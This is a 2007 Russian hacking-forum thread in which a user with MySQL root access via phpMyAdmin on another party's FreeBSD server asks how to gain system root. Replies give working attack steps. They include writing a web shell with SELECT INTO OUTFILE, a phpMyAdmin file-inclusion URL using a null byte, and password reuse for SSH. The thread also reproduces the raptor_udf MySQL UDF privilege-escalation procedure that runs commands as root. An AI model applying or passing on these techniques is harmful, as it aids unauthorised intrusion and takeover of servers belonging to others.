Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Имею рута Mysql на FreeBSD - помогите поиметь больше |
25.03.2007, 03:07
|
|
Познающий
Регистрация: 11.03.2007
Сообщений: 57
Провел на форуме:
89195
Репутация:
1
|
|
Имею рута Mysql на FreeBSD - помогите поиметь больше
Имею рута Mysql на FreeBSD - помогите поиметь больше
Есть сервер FreeBSD
на нем через phphmyadmin имею рутовский доступ к mysql
Welcome to phpMyAdmin 2.6.1-pl2
MySQL 4.1.14 running on localhost as root@localhost
посмотрел через LOAD_FILE данные - нашел 1 домен на сервере
посмотрел папки что в корне домена - нет ниодной с правами записаи
Помогите с технологией - как поиметь рута или фтп на этом сервере
p.s. то Админы - третий раз пишу этот пост - что то в дргом разделе не проходил он
если вдруг вылезут все мессаджи -то не ругайте - а просто кильните все кроме этого
Последний раз редактировалось undewaternemo; 25.03.2007 в 03:11..
|
|
|
25.03.2007, 06:55
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
Залей шелл, через мускл.....подробнее здесь |
|
|
|
25.03.2007, 10:43
|
|
Познающий
Регистрация: 11.03.2007
Сообщений: 57
Провел на форуме:
89195
Репутация:
1
|
|
Сообщение от Isis
Залей шелл, через мускл.....подробнее здесья написал в первом посту что папок для записи в вебовской директории необнаружено.
поэтому не могу выполнить
select 'test' into outfile '/www/xx/xxxxxxxx.com/test.php';
вываливается
#1 - Can't create/write to file '/www/xx/xxxxxxxx.com/test.php' (Errcode: 13)
путь такой существует - если ошибаюсь с путем то вываливается (Errcode: 2)
подскажите - что можно сделать в такой ситуации
p.s нашел phpinfo на этой машинке
выдает
PHP Version 5.2.1
Последний раз редактировалось undewaternemo; 25.03.2007 в 11:06..
|
|
|
|
25.03.2007, 13:18
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
вываливается
#1 - Can't create/write to file '/www/xx/xxxxxxxx.com/test.php' (Errcode: 13)
ищи дир доступную на запись.. аеще луче делай шелл инто аутфайл а потом
сайт/phpmyadmin/libraries/database_interface.lib.php?cfg[Server][extension]=блабла%00
инклудь тот шелл что в тмп.. версия как раз подходящая
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
25.03.2007, 17:08
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524
Репутация:
715
|
|
неужели в базе нет полезной инфы?
|
|
|
|
25.03.2007, 18:01
|
|
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
Провел на форуме:
2487541
Репутация:
761
|
|
Имея рута в mysql не означает, что ты имеешь рут в самой системе. Просто у тебя есть максимальные права на управление базой. Вот и все. Залив шелл у тебя будет обычный шелл с правами вебсервера, но никак не с root  |
|
|
|
25.03.2007, 22:30
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524
Репутация:
715
|
|
для начала попробуй войти под рутом, либо админом по ssh с тем же паролем что и к бд.
|
|
|
|
25.03.2007, 22:38
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
http://milw0rm.com/exploits/1181
http://milw0rm.com/exploits/1518
Код:
* Usage:
* $ id
* uid=500(raptor) gid=500(raptor) groups=500(raptor)
* $ gcc -g -c raptor_udf.c
* $ gcc -g -shared -W1,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc
* $ mysql -u root -p
* Enter password:
* [...]
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file('/home/raptor/raptor_udf.so'));
* mysql> select * from foo into dumpfile '/usr/lib/raptor_udf.so';
* mysql> create function do_system returns integer soname 'raptor_udf.so';
* mysql> select * from mysql.func;
* +-----------+-----+---------------+----------+
* | name | ret | dl | type |
* +-----------+-----+---------------+----------+
* | do_system | 2 | raptor_udf.so | function |
* +-----------+-----+---------------+----------+
* mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
* mysql> \! sh
* sh-2.05b$ cat /tmp/out
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* [...]
всё что те осталось это шелл и удача
__________________
Последний раз редактировалось +toxa+; 25.03.2007 в 23:02..
|
|
|
|
25.03.2007, 23:46
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524
Репутация:
715
|
|
вот именно что интерактивный шелл нужен))
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
